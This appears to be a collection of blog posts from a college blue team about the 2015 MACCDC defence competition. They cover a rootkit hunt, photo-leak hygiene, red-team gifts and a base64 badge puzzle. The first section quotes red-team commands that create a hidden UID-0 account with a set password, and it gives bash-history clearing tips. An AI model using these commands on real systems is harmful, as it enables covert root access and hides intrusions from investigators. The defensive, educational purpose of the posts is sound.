rkhunter (Rootkit Hunter) did not find it in my tests on a VM. Did you have different results?

What did you find on your malware hunting adventure? Please share and lets learn from each other.

Do any red teamers want to own up to this or fill-in the gaps?

What I learned from this:

I didn’t know you could add a user and set a password like that. I see how it works and why it works but I never thought of doing it that way.

10 useradd -o -u 0 -g 0 mysqld
11 echo -e "r3dt3am\nr3dt3am\n" | passwd mysqld

I learned about Xingyiquan rootkit, how to install it and use it, which now shows me what to look for.

I also learned to check all users’ crontabs, and /etc/cron.d, more frequently.

I almost forgot the most obvious thing in this article: clear your bash history. If you can read it, so can someone else. Note that history -c only clears the running shell’s in-memory list; follow it with history -w (or unset HISTFILE) so the old contents are not written back to ~/.bash_history when the shell exits. If the history is evidence, as it was here, copy it somewhere safe first.

history -c

The “No Pictures” Policy

We at AACC always enforce a strict no-pictures policy at qualifiers until it’s over. Then we enforce a no-social-media policy. Here’s why…

After qualifiers I went searching through social media and turned up a couple of posts regarding MACCDC Qualifiers. This was one of those posts, from a competing school:

This picture was taken before qualifiers began and was posted before they began. The caption read “Ready for this…”

Ready for this…

The problem is what’s in the background:

Passwords on the whiteboard!!!!!

4URedSucksTeam

What other information can we see?

Listing Roles & Chain of Command, from Mubix’s “How to Win CCDC” Presentation.

WiFi networks @ your school:

WiFi Networks

We can almost read the Sticky Notes on the desktop:

Sticky Notes

After the competition, it becomes a little more revealing:

After

Let’s zoom in on each piece: Enhance…. Enhance… Enhance…

A printed slide from Mubix’s “How to Win CCDC” presentation.

Which tools are they using:

Another printed slide from Mubix’s “How to Win CCDC” presentation.

Looks like PBX to me:

root@ip-10-10-10-110:

MySQL service won’t stay started: (More on this in a future post.)

service mysql start

Crème de la Crème: Moar Passwords!!!!

Moar Passwords

This post is not meant to make fun of or point out any flaws in any one person. This post is to bring awareness to the rest of the BlueTeam community that seemingly harmless photos can sometimes be too revealing.

Personally, I don’t even like posting pictures after the competition just in-case I make it to regionals and maybe nationals I don’t want to accidentally reveal any information to prying eyes.

As a team you should discuss whether or not you want to have a Pictures/Posting Policy and what it should be.

What are the policies at your school? What should they be?

Let’s see if the red team can guess which school this was based on the passwords.

Offerings to the gods – Gifts for Red Team

I have participated in 2 MACCDCs, 2014 & 2015. As far as I know we are the only team that does this.

We bring in a gift for the Red Team on the morning of day 2 before competition starts. We generally have an associate from our school drop it off so we don’t violate the direct-contact clause in the rule manual.

In 2013 it was assorted donuts, and a card sealed with a kiss of red lipstick.

In 2014 we sent flowers, pink balloons and again a card with a kiss of red lipstick… I think.

This year, 2015, we bought a pineapple and hollowed it out, filled it with cheap pink & blue dollar shooter bottles, and added WiFi antennae for looks. Boom. WiFi Pineapple. Happy hacking.

I got 99 Problems…
To Red Team
With Love
WiFi Pineapple

MACCDC 2015 – Badges

This year’s competition was called “Operation Transit Storm” and was based on public transportation. It was only fitting that our badges fit the same theme. Larry Pesce (@haxorthematrix) did the badges as he has done in years past.

Upon entering on Thursday we were each given a blue etched badge on a lanyard with an RFID card glued to the back of it, a Raspberry Pi B+, a 3-page manual (Derpypot 1.0 Instructions) and verbal instructions that “this is a honeypot; use it if you wish. The login name and operating instructions are in the packet but you’ll have to figure out the password to log in.”

Our blue badges were completely etched with something base64 encoded. We were all instructed to move into the auditorium, where we would be briefed on the following day’s schedule of events.

MACCDC2015 Blue Etched Badge

While waiting we took out our badges and typed the etching into a base64 decoder.

BASE64 Decode

rootkitthenutwork.net??? Was this a typo? We checked the DNS TXT records for rootkitthenutwork.net and didn’t get anything. We tried rootkitthenetwork.net and got:

DNS TXT Record

We tried navigating to both sites but neither had any pages published.

A quick googling using the half of the quote we were given quickly yielded the other half.

What do I care about law?

Later that night it was confirmed that one of the teams had bought rootkitthenutwork.net and stood up a page with false clues for solving the puzzle. I forget which school it was, but I thought buying the domain that morning was pretty good.

The next morning I approached Larry and asked whether he had intentionally thrown us off with the typo “nutwork”. He said no, and that whoever owned that domain was just having fun with us. The difference was in transcribing the etching from the badge into the decoder: if you read the character as a “1” it came out ‘nutwork’; if you read it as a lowercase “l” it came out ‘network’.

cm9vdGtpdHRoZW51dHdvcmsuY29tlGRucyB0eHQ=

cm9vdGtpdHRoZW5ldHdvcmsuY29tlGRucyB0eHQ=
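As an added example (not part of the original post), the script below decodes the two transcriptions above exactly as printed, then tries every reading of the glyphs that look alike on an etched badge (1, l and I) and keeps only the readings that decode to clean ASCII. The badge strings are the ones on this page; the set of confusable glyphs is my choice. Run as is, it shows that neither string as printed decodes cleanly: the same 1/l/I ambiguity occurs a second time further along, and only one reading of that position yields text.

```python
"""Try every lookalike reading of a hand-transcribed base64 string.

Added example, not part of the original post. BADGE_* are the two
transcriptions printed above; LOOKALIKES is my choice of confusable glyphs.
"""
import base64
import binascii
import itertools
from typing import Dict, List, Optional

LOOKALIKES = [set("1lI")]                      # add set("0O") for a 0/O confusion
BADGE_NUTWORK = "cm9vdGtpdHRoZW51dHdvcmsuY29tlGRucyB0eHQ="
BADGE_NETWORK = "cm9vdGtpdHRoZW5ldHdvcmsuY29tlGRucyB0eHQ="


def alternatives(ch: str) -> List[str]:
    """All glyphs this character could have been, itself included."""
    for group in LOOKALIKES:
        if ch in group:
            return sorted(group)
    return [ch]


def decode_or_none(s: str) -> Optional[bytes]:
    """Strict base64 decode; None if the string is not valid base64."""
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def printable(raw: bytes) -> bool:
    """True when every byte is printable ASCII (space through tilde)."""
    return all(0x20 <= b < 0x7F for b in raw)


def readings(transcribed: str) -> Dict[str, str]:
    """Every substitution of lookalike glyphs that decodes to printable ASCII."""
    spots = [i for i, ch in enumerate(transcribed) if len(alternatives(ch)) > 1]
    found: Dict[str, str] = {}
    for combo in itertools.product(*(alternatives(transcribed[i]) for i in spots)):
        chars = list(transcribed)
        for i, ch in zip(spots, combo):
            chars[i] = ch
        variant = "".join(chars)
        raw = decode_or_none(variant)
        if raw is not None and printable(raw):
            found[variant] = raw.decode("ascii")
    return found


if __name__ == "__main__":
    for badge in (BADGE_NUTWORK, BADGE_NETWORK):
        raw = decode_or_none(badge)
        state = "(clean)" if raw is not None and printable(raw) else "(not clean ASCII)"
        print(badge, "->", raw, state)
        for variant, text in readings(badge).items():
            print("  ", variant, "->", text)
```

The number of variants grows as 3 to the power of the number of ambiguous positions, which is fine for a 40-character badge; for a longer string, decode it in 4-character groups and resolve each group on its own, since base64 groups are independent.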

On the Pi is Tom’s Honeypot.